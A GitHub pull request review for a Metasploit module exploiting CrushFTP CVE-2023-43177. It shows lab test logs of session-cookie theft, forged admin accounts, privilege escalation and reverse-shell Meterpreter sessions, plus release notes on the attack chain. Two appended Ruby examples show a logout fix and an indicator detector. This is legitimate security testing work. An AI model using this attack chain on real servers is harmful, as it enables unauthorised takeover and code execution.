CrushFTP unauthenticated RCE (CVE-2023-43177) #18918
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
Great module @cdelafuente-r7. A very clean implementation of a complex exploit 👏 A couple minor nitpicks.
Testing went smoothly on both Windows and Linux. Testing the non-administrative user session on Linux took a couple of tries because of a cached admin cookie, although that's not a bad problem to have (the module wouldn't stop taking its most efficient code path).
Windows
Admin User
msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Downloading the session file
[+] Session file downloaded
[*] Looking for the valid sessions
[*] Checking if user crushadmin is an admin (cookie: 1711571844199_Lom80xw3xbjL50Y7mBFI1mC1tK0v7k)
[+] It is an admin! Let's create a temporary admin account
[+] Administrator account created: username=993d861677, password=d44916df5c
[*] Uploading payload .jar file `5191.jar` to C:/Users/Public/5191.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Sending stage (57971 bytes) to 172.16.199.131
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_ff3f5f2020-js
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:50421) at 2024-03-27 13:49:57 -0700
[!] This exploit may require manual cleanup of 'C:/Users/Public/5191.jar' on the target
meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer : DESKTOP-N3ORU31
OS : Windows 10 10.0 (amd64)
Architecture : x64
System Language : en_US
Meterpreter : java/windows
Non-privileged User
msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711574408402_4PHT1TDv7BpatlfY7f00JtQNEjhL4T
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711574408402_4PHT1TDv7BpatlfY7f00JtQNEjhL4T`
[+] The target appears to be vulnerable.
[*] Downloading the session file
<redacted>
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_27958456ca-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711574716304_OxUot9xce5Ra0yd3rCY0LohgD2mkHK`
[*] Looking for the valid sessions
[*] Found 123 session cookies in the session file
[*] Cookie `1711574705730_qXCIhCjzz2QaCbw4sQ0VsrQZ0J9Og5` is valid session (username: testuser)
[*] Cookie `1711573381058_LvTXbIZGcmx9qJ8tmiXmYxQb60dlRI` is not valid
<redacted>
[*] Cookie `1711574700714_5IFxQf2vgKr5tOGkKOdrUlpJjJQCZz` is not valid
[*] Checking if user testuser is an admin (cookie: 1711574705730_qXCIhCjzz2QaCbw4sQ0VsrQZ0J9Og5)
[*] Could not find any admin session or the admin account creation failed
[*] Attempting privilege escalation with session cookie {:cookie=>"1711574705730_qXCIhCjzz2QaCbw4sQ0VsrQZ0J9Og5", :username=>"testuser"}
[*] Looking for a directory with write permissions
[+] Found a writable directory: /testing
[*] Uploading the egg file `190438929f`
[*] Uploading `user.XML` to /testing/user.XML
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711574721227_y3TKeeMFVqbr14yU23zctJ5HhBYCXZ
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_27958456ca-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711574721227_y3TKeeMFVqbr14yU23zctJ5HhBYCXZ`
[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)
<redacted>
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711575332543_afV8HRseYl2E1rIu0Q6IWchgKQ1z9b
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_27958456ca-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711575332543_afV8HRseYl2E1rIu0Q6IWchgKQ1z9b`
[*] Found the egg at FILE://C:/Users/msfuser/Desktop/testing/190438929f in the session file
[+] Found path `C:/Users/msfuser/Desktop/testing/` and it is Windows
[+] Found the file system path: C:/Users/msfuser/Desktop/testing/
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711575332746_UvjzcSwGj1oWrnViKe50Opay2NjrpX
[*] The forged user will be `5ef2802132`
[*] Moving user.XML from C:/Users/msfuser/Desktop/testing/ to `5ef2802132` home folder and elevate privileges
[*] Logging out session cookie `1711575332746_UvjzcSwGj1oWrnViKe50Opay2NjrpX`
[*] Logging into the elevated account
[*] [do_login] Logging in with username `5ef2802132` and password `c9f35fc21b`
[+] Logged in! Now let's create a temporary admin account
[*] Logging out session cookie `1711575332924_qI4Y5cdGLXWWGESFv0O37Xd3XLjcwc`
[+] Administrator account created: username=12d0ab650f, password=b4e7b73d9b
[*] [do_login] Logging in with username `12d0ab650f` and password `b4e7b73d9b`
[*] Uploading payload .jar file `143e.jar` to C:/Users/Public/143e.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Logging out session cookie `1711575333206_F4qLTAR1lf7aeqjUqxazbw6mcDcSrW`
[*] Sending stage (57971 bytes) to 172.16.199.131
[+] Deleted C:/Users/msfuser/Desktop/testing/190438929f
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_27958456ca-js
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:50703) at 2024-03-27 14:35:37 -0700
[!] This exploit may require manual cleanup of 'C:/Users/Public/143e.jar' on the target
meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer : DESKTOP-N3ORU31
OS : Windows 10 10.0 (amd64)
Architecture : x64
System Language : en_US
Meterpreter : java/windows
meterpreter >
Linux
Admin User
msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > set rhosts 172.16.199.132
rhosts => 172.16.199.132
msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711578276060_TIJ7sl1znsmDxuJNRkZr9SzrruwuFz
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711578276060_TIJ7sl1znsmDxuJNRkZr9SzrruwuFz`
[+] The target appears to be vulnerable.
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711578276124_GCT660ZyH3GRFjqBoG1JrVCaGZaZWA
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_261c9456a4-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711578276124_GCT660ZyH3GRFjqBoG1JrVCaGZaZWA`
[*] Looking for the valid sessions
[*] Found 2 session cookies in the session file
[*] Cookie `1711578219100_DfSoK3LJBwE6H9jI6On9HFgRCGKPcO` is valid session (username: crushadmin)
[*] Cookie `1711577623584_vO7e9cCuVtVC6DQdtYwEdqvGthXYtW` is valid session (username: crushadmin)
[*] Checking if user crushadmin is an admin (cookie: 1711578219100_DfSoK3LJBwE6H9jI6On9HFgRCGKPcO)
[+] It is an admin! Let's create a temporary admin account
[+] Administrator account created: username=0a9a861e09, password=9e6fb1989e
[*] [do_login] Logging in with username `0a9a861e09` and password `9e6fb1989e`
[*] Uploading payload .jar file `13a3.jar` to /var/tmp/13a3.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Logging out session cookie `1711578276318_D6ETTPhAHT1BtEOp0L6Fc8SPRC2HEV`
[*] Sending stage (57971 bytes) to 172.16.199.132
[+] Deleted /var/tmp/13a3.jar
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_261c9456a4-js
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.132:39168) at 2024-03-27 15:24:08 -0700
meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer : msfuser-virtual-machine
OS : Linux 6.5.0-26-generic (amd64)
Architecture : x64
System Language : en_CA
Meterpreter : java/linux
meterpreter >
Non-privileged User
msf6 exploit(multi/http/crushftp_rce_cve_2023_43177) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking CrushFTP Server
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643752908_sQRhCRhbCnCFCYwCycOT0vkjEB1khz
[*] Checking if the attack primitive works
[*] Logging out session cookie `1711643752908_sQRhCRhbCnCFCYwCycOT0vkjEB1khz`
[+] The target appears to be vulnerable.
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643752950_wr08JKNW4N02kxnI76XmLqmltD5KvI
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711643752950_wr08JKNW4N02kxnI76XmLqmltD5KvI`
[*] Looking for the valid sessions
[*] Found 0 session cookies in the session file
[*] No valid sessions found, wait 30 seconds and try again... (Ctrl-C to exit)
[*] Downloading the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643783883_jVe9eZS1bX1UmpJHnvf8OuLiRRcRXO
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711643783883_jVe9eZS1bX1UmpJHnvf8OuLiRRcRXO`
[*] Looking for the valid sessions
[*] Found 93 session cookies in the session file
[*] Cookie `1711643749455_SVZvsOplN6LhuTjYlZ8Py9CySaSLXS` is an anonymous session
[*] Cookie `1711643042749_BNgcWukRuQ2EuIrDbLYGAQSPn8HVYj` is valid session (username: testuser)
[*] Cookie `1711579574357_zeud0fWqHSpBUzJA91u98rZrcaHfqy` is not valid
<redacted>
[*] Cookie `1711643752908_sQRhCRhbCnCFCYwCycOT0vkjEB1khz` is not valid
[*] Checking if user testuser is an admin (cookie: 1711643042749_BNgcWukRuQ2EuIrDbLYGAQSPn8HVYj)
[*] Could not find any admin session or the admin account creation failed
[*] Attempting privilege escalation with session cookie {:cookie=>"1711643042749_BNgcWukRuQ2EuIrDbLYGAQSPn8HVYj", :username=>"testuser"}
[*] Looking for a directory with write permissions
[+] Found a writable directory: /Desktop
[*] Uploading the egg file `2638fb4da2`
[*] Uploading `user.XML` to /Desktop/user.XML
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643785469_DgrqaZSqWo0f6YcHAHnj7S5ntsknk0
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711643785469_DgrqaZSqWo0f6YcHAHnj7S5ntsknk0`
[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643816398_6h4OUT85KRVs86hUbpqQL7tXiraZms
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711643816398_6h4OUT85KRVs86hUbpqQL7tXiraZms`
[*] Egg not found, wait 30 seconds and try again... (Ctrl-C to exit)
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711643847292_Ns6cFYAlmJRe5DIRiLLDlWBHNhs5SC
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Session file has not changed yet, skipping
[*] Logging out session cookie `1711643847292_Ns6cFYAlmJRe5DIRiLLDlWBHNhs5SC`
<redacted>
[*] Looking for the egg in the session file
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711644456188_iuq4kvxnsdAO7PkXvMkamEhmUWF5RR
[*] Getting session file at `WebInterface/Resources/libs/jq-3.6.0_53918e3561-js/`
[+] Session file downloaded
[*] Logging out session cookie `1711644456188_iuq4kvxnsdAO7PkXvMkamEhmUWF5RR`
[*] Found the egg at FILE://home/msfuser/Desktop/2638fb4da2 in the session file
[+] Found path `/home/msfuser/Desktop/` and it is Unix-like
[+] Found the file system path: /home/msfuser/Desktop/
[*] Getting a new anonymous session
[*] Anonymous session cookie: 1711644456289_G9RUPhsOQt9nobO2lWFyi3bPfgj0Au
[*] The forged user will be `db13909bb2`
[*] Moving user.XML from /home/msfuser/Desktop/ to `db13909bb2` home folder and elevate privileges
[*] Logging out session cookie `1711644456289_G9RUPhsOQt9nobO2lWFyi3bPfgj0Au`
[*] Logging into the elevated account
[*] [do_login] Logging in with username `db13909bb2` and password `ba82144d38`
[+] Logged in! Now let's create a temporary admin account
[*] Logging out session cookie `1711644456342_fguw9t7QiTEMnEZHjL56Z65ryFqt5j`
[+] Administrator account created: username=941449f87d, password=c90677b4b1
[*] [do_login] Logging in with username `941449f87d` and password `c90677b4b1`
[*] Uploading payload .jar file `49a4.jar` to /var/tmp/49a4.jar
[*] Triggering the payload
[*] Cleanup the temporary admin account
[*] Logging out session cookie `1711644456487_GXEtswO3Y70GSItRFaz4oCd5oZXjK0`
[*] Sending stage (57971 bytes) to 172.16.199.132
[+] Deleted /home/msfuser/Desktop/2638fb4da2
[+] Deleted /var/tmp/49a4.jar
[+] Deleted ./WebInterface/Resources/libs/jq-3.6.0_53918e3561-js
[*] Meterpreter session 7 opened (172.16.199.1:4444 -> 172.16.199.132:34056) at 2024-03-28 09:47:08 -0700
meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer : msfuser-virtual-machine
OS : Linux 6.5.0-26-generic (amd64)
Architecture : x64
System Language : en_CA
Meterpreter : java/linux
meterpreter >
documentation/modules/exploit/multi/http/crushftp_rce_cve_2023_43177.md
move_user_xml(admin_username, is_windows ? Regexp.last_match(:path) : path)

do_logout(cookie)
cookie = nil
Very minor but is setting `cookie = nil` here necessary? It's already been initialized in this context and on line 461 `do_login` is going to set `cookie` to either `nil` or the cookie found during authentication.
`cookie` is explicitly set to `nil` here to make sure the ensure block won't log it out again if the next call to `do_login(admin_username, admin_password)` raises an exception. Without this line, if `do_login` raises an exception, `cookie` will still contain the value of the previous session cookie, which should have been logged out at this point. The ensure block will try to log out the same session again.

I'll add a comment to explain this. Thank you for bringing this to my attention, I agree it is not clear in the code.
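The double-logout hazard discussed in this thread, as an added example that is not the module's code: `FakeServer` is a hypothetical in-memory stand-in that records every logout call, and `run_sequence` mirrors the logout-then-relogin step with an ensure block, with or without clearing the stale cookie first.

```ruby
# Hypothetical server stub: records logouts and can make the second login
# fail, which is the failure path the review comment is about.
class FakeServer
  attr_reader :logouts

  def initialize(fail_second_login: false)
    @logouts = []
    @logins = 0
    @fail_second_login = fail_second_login
  end

  def login(user)
    @logins += 1
    raise "login failed for #{user}" if @fail_second_login && @logins == 2

    "#{@logins}_#{user}_cookie"
  end

  def logout(cookie)
    @logouts << cookie
  end
end

# Logs out the first session, then logs into a second account.
# clear_cookie: whether the stale cookie is cleared before the re-login.
# Returns the final cookie, or nil when the re-login raised.
def run_sequence(server, clear_cookie:)
  cookie = server.login('testuser')
  # ... work done with the first session ...
  server.logout(cookie)
  cookie = nil if clear_cookie
  cookie = server.login('elevated')
  cookie
rescue RuntimeError
  nil
ensure
  # Cleanup: log out whatever session is still tracked. Without the
  # clearing step, a failed re-login leaves the old cookie here and it is
  # logged out a second time.
  server.logout(cookie) if cookie
end

if __FILE__ == $PROGRAM_NAME
  [false, true].each do |clear|
    server = FakeServer.new(fail_second_login: true)
    run_sequence(server, clear_cookie: clear)
    puts "clear_cookie=#{clear}: logouts=#{server.logouts.inspect}"
  end
end
```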
Thank you @jheysel-r7 for your review! I think I have addressed all your comments in the last commit.
Release Notes
This exploit module leverages an Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability (CVE-2023-43177) to achieve unauthenticated remote code execution. This affects CrushFTP versions prior to 10.5.1.
It is possible to set some of a user's session properties by sending an HTTP request with specially crafted header key-value pairs. This enables an unauthenticated attacker to access files anywhere on the server file system and steal the session cookies of valid authenticated users. The attack consists of hijacking a user's session and escalating privileges to obtain full control of the target. Remote code execution is obtained by abusing the dynamic SQL driver loading and configuration testing feature.
Attack Details
The module will first get an anonymous session by querying a non-existing page and set a few session properties through specifically crafted HTTP headers. The `user_log_file`, `user_log_path` and `user_log_path_custom` properties are set in a way that results in moving any file to any location on the server. This primitive is used to retrieve the CrushFTP cache session file (`sessions.obj`), which contains all the active session cookies.

From there, the module will check if one of these session cookies belongs to an administrator and upload a payload (`.jar` file) to a temporary location on the server. It will then send a request to the `testDB` API, specifying the path of the SQL driver pointing to the payload. This will result in the execution of the payload in the context of the user running CrushFTP, usually root on Linux or SYSTEM on Windows.

In case no administrator sessions are found in the session file, the module will attempt to escalate privileges of any non-administrative sessions. It will abuse the fact that CrushFTP supports filesystem-based accounts, which are defined in folders containing a `user.XML` file. This is done by taking advantage of the arbitrary file move primitive to upload and move a specifically crafted `user.XML` file to the right location.

Note that since the session cookies and other information are retrieved from the CrushFTP session file, and because this file is created by the server approximately every 10 minutes, the module will attempt to download it repeatedly every 30 seconds by default (this can be changed by setting the `SESSION_FILE_DELAY` option).

More details on these techniques here.
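As an added example (not part of the module or of CrushFTP), a small Ruby detector that flags the request patterns the description above makes observable from the defender's side: the session-property header names, a fetch of the moved session file from the jQuery-lookalike path seen in every run above, and a `testDB` call whose driver parameter names a `.jar` on disk instead of a JDBC driver class. The request shape, the `command`/`driver` parameter names and all sample records are assumptions constructed for this example.

```ruby
require 'uri'

# Session properties the module sets through crafted HTTP header names.
SESSION_PROPERTY_HEADERS = %w[user_log_file user_log_path user_log_path_custom].freeze
# The moved session file is fetched from a path mimicking a jQuery library
# directory with a 10-hex-digit suffix (generalised from the runs above).
SESSION_FILE_RE = %r{/WebInterface/Resources/libs/jq-3\.6\.0_[0-9a-f]{10}-js(/|$)}i
JAR_RE = /\.jar\z/i

# Returns the CVE-2023-43177 indicators matched by one request.
# headers: Hash of name => value; body: URL-encoded form body (the testDB
# call is assumed to be a POST with a `command` parameter; assumption).
def classify_request(method, url, headers, body = '')
  hits = []
  names = headers.keys.map { |k| k.to_s.downcase }
  hits << 'session-property-header' unless (names & SESSION_PROPERTY_HEADERS).empty?
  uri = URI.parse(url)
  hits << 'session-file-fetch' if method.upcase == 'GET' && uri.path =~ SESSION_FILE_RE
  params = URI.decode_www_form(uri.query.to_s).to_h.merge(URI.decode_www_form(body).to_h)
  # A legitimate testDB call names a JDBC driver class, not a .jar on disk.
  if params['command'].to_s.casecmp('testdb').zero? && params.values.any? { |v| v.strip =~ JAR_RE }
    hits << 'testdb-jar-driver'
  end
  hits
end

# Runs the classifier over request records; returns [index, hits] pairs.
def scan(records)
  findings = []
  records.each_with_index do |rec, i|
    hits = classify_request(rec[:method], rec[:url], rec[:headers] || {}, rec[:body] || '')
    findings << [i, hits] unless hits.empty?
  end
  findings
end

# Constructed sample traffic modelled on the runs above (all values made up).
SAMPLE_REQUESTS = [
  { method: 'GET', url: '/WebInterface/doesnotexist',
    headers: { 'User-Agent' => 'curl/8.0', 'user_log_path_custom' => '<crafted value omitted>' } },
  { method: 'GET', url: '/WebInterface/Resources/libs/jq-3.6.0_0123456789-js/', headers: {} },
  { method: 'POST', url: '/WebInterface/function/', headers: {},
    body: 'command=testDB&driver=/var/tmp/13a3.jar' },
  { method: 'GET', url: '/WebInterface/Resources/libs/jquery-3.6.0.min.js', headers: {} },
  { method: 'POST', url: '/WebInterface/function/', headers: {},
    body: 'command=testDB&driver=org.postgresql.Driver' }
].freeze

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_REQUESTS).each { |i, hits| puts "request #{i}: #{hits.join(', ')}" }
end
```

Only the first three sample records are flagged; the legitimate jQuery fetch and the `testDB` call with a driver class name pass through.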
Install CrushFTP
Download and follow the installation steps from the official website (https://www.crushftp.com/download.html).
Set up a new user to test the privilege escalation attack (optional)
This module can be tested with only an administrator logged into the application. To test the privilege escalation attack, a non-administrator user needs to be set up.
1. Go to `Admin` and `User Management`.
2. Click the `+ Add` button to create a new user (provide a username and a password).
3. In the `User Settings` pane, select a location in the server file system that will be the root directory for this user. You can create a new folder by clicking the first button on the left hand side. Go ahead and create multiple subdirectories also.
4. Give the user `Upload` and `Delete` permissions on the right hand side.
5. Click `Save`.
Verification Steps
use multi/http/crushftp_rce_cve_2023_43177
set target <target>
set payload <payload>
run rhosts=<target address>
You will need to have an active user's session on the server. For this, you can log into the application with an administrator account or with a non-privileged user. The latter will trigger the privilege escalation routine.
Since the module needs to download the cache session file one or two times, depending on whether privilege escalation is required, it can take up to 20 minutes to get remote code execution. So, make sure the authenticated user does not log out and the session does not time out before the exploit finishes.
Scenarios
Target 0 (Java) against CrushFTP version 10.5.0_3 on Windows
With an active administrator session
With an active non-privileged session (privilege escalation)
Target 0 (Java) against CrushFTP version 10.5.0_3 on Linux
With an active administrator session
With an active non-privileged session (privilege escalation)